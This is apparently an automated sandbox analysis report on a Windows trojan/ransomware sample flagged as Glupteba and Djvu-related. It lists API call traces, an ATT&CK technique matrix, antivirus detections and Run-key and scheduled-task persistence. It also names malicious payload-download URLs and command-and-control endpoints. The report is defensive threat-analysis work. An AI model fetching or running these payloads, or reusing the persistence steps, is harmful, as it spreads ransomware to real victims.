              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_00F48178
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00F50116
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00F482A2
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_00F4834F
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,0_2_00F48423
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,0_2_00F487C8
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,0_2_00F4884E
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,0_2_00F47BB3
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00F47E83
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,0_2_00F47E27
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_00F47F83
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00F47F00
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00F48178
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00F50116
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00F482A2
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_00F4834F
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00F48423
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,2_2_00F487C8
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,2_2_00F4884E
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00F47BB3
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00F47E83
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,2_2_00F47E27
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00F47F83
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00F47F00
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_00F38178
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00F40116
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00F382A2
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_00F3834F
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,3_2_00F38423
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,3_2_00F387C8
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,3_2_00F3884E
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,3_2_00F37BB3
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00F37E83
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,3_2_00F37E27
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_00F37F83
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00F37F00
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,4_2_00F38178
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_00F40116
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00F382A2
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,4_2_00F3834F
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,4_2_00F38423
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,4_2_00F387C8
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: GetLocaleInfoW,4_2_00F3884E
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,4_2_00F37BB3
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_00F37E83
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: EnumSystemLocalesW,4_2_00F37E27
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,4_2_00F37F83
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_00F37F00
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F42283 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F42283
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F29F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F3FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00F3FE47
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F29F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,0_2_00F29F90
Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | OS Credential Dumping | 2 System Time Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 2 Data Encrypted for Impact
Credentials | Domains | Default Accounts | 3 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 2 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 Services File Permissions Weakness | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Services File Permissions Weakness | 1 Masquerading | NTDS | 24 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Virtualization/Sandbox Evasion | LSA Secrets | 1 Query Registry | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Process Injection | Cached Domain Credentials | 151 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Services File Permissions Weakness | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 2 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
[Behavior graph: ID 1390473; Sample: c62d6a8f03122f152f75051babb...; Startdate: 12/02/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label | Link
c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe | 87% | ReversingLabs | Win32.Trojan.Glupteba |
c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe | 79% | Virustotal | | Browse
c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe | 100% | Avira | HEUR/AGEN.1319085 |
c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe | 100% | Avira | HEUR/AGEN.1319085 |
C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe | 87% | ReversingLabs | Win32.Trojan.Glupteba |
C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe | 79% | Virustotal | | Browse

No Antivirus matches

Source | Detection | Scanner | Label | Link
zexeq.com | 21% | Virustotal | | Browse
colisumy.com | 20% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://colisumy.com/dl/build2.exe$run | 100% | URL Reputation | malware |
http://zexeq.com/files/1/build3.exe$run | 100% | URL Reputation | malware |
http://zexeq.com/raud/get.php | 100% | URL Reputation | malware |
http://colisumy.com/dl/build2.exe | 100% | URL Reputation | malware |
http://zexeq.com/raud/get.phpep | 100% | URL Reputation | malware |
http://www.wikipedia.com/ | 0% | URL Reputation | safe |
http://zexeq.com/files/1/build3.exe | 100% | URL Reputation | malware |
https://we.tl/t-OQnsJqCO | 0% | Avira URL Cloud | safe |
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error | 0% | Avira URL Cloud | safe |
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true | 100% | Avira URL Cloud | malware |
http://zexeq.com/files/1/build3.exerun | 100% | Avira URL Cloud | malware |
http://colisumy.com/dl/build2.exerun | 100% | Avira URL Cloud | malware |
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true( | 100% | Avira URL Cloud | malware |
http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0 | 100% | Avira URL Cloud | malware |
http://colisumy.com/dl/build2.exerun | 17% | Virustotal | | Browse
http://zexeq.com/files/1/build3.exe$runW= | 100% | Avira URL Cloud | malware |
http://zexeq.com/files/1/build3.exerun | 16% | Virustotal | | Browse
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 | 100% | Avira URL Cloud | malware |
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637fo | 100% | Avira URL Cloud | malware |
https://we.tl/t-OQnsJqCOOl | 0% | Avira URL Cloud | safe |
http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0 | 16% | Virustotal | | Browse
https://we.tl/t-OQnsJqCOOl | 0% | Virustotal | | Browse

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.2ip.ua | 104.21.65.24 | true | false | | high
zexeq.com | 199.59.242.150 | true | true | | unknown
colisumy.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true | true | Avira URL Cloud: malware | unknown
http://zexeq.com/raud/get.php | true | URL Reputation: malware | unknown
https://api.2ip.ua/geo.json | false | | high
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 | true | Avira URL Cloud: malware | unknown
http://zexeq.com/files/1/build3.exe | true | URL Reputation: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
199.59.242.150 | zexeq.com | United States | 395082 | BODIS-NJUS | true
104.21.65.24 | api.2ip.ua | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1390473
Start date and time: 2024-02-12 01:35:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
Detection: MAL
Classification: mal100.rans.spre.troj.evad.winEXE@9/1138@3/2
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 99%
                                                                                  • Number of executed functions: 105
                                                                                  • Number of non-executed functions: 218
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                  • Report size getting too big, too many NtWriteFile calls found.
Time | Type | Description
00:35:56 | Task Scheduler | Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe s>--Task
00:35:58 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart
00:36:07 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart
01:36:16 | API Interceptor | 1x Sleep call for process: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe modified
                                                                                                      • 175.119.10.231
                                                                                                      9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                      • 175.120.254.9
                                                                                                      UpS8Qm873s.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                      • 175.120.254.9
                                                                                                      g0Zq7nJjus.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                      • 196.188.169.138
                                                                                                      E0tabE4K4r.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                      • 109.175.29.39
                                                                                                      sbvN2ih5AU.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                      • 175.120.254.9
                                                                                                      kOVwcHSfrR.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                      • 186.182.55.44
                                                                                                      file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                      • 180.94.156.61
                                                                                                      file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                      • 211.119.84.111
                                                                                                      api.2ip.uasTsbAmON9u.exeGet hashmaliciousLummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, XmrigBrowse
                                                                                                      • 172.67.139.220
                                                                                                      amONbBvdCh.exeGet hashmaliciousLummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, XmrigBrowse
                                                                                                      • 104.21.65.24
                                                                                                      rR15ofOPl3.exeGet hashmaliciousLummaC, Amadey, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLineBrowse
                                                                                                      • 104.21.65.24
                                                                                                      KMPrEVaSfH.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                      • 172.67.139.220
                                                                                                      x5DUhRx3Eq.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                      • 104.21.65.24
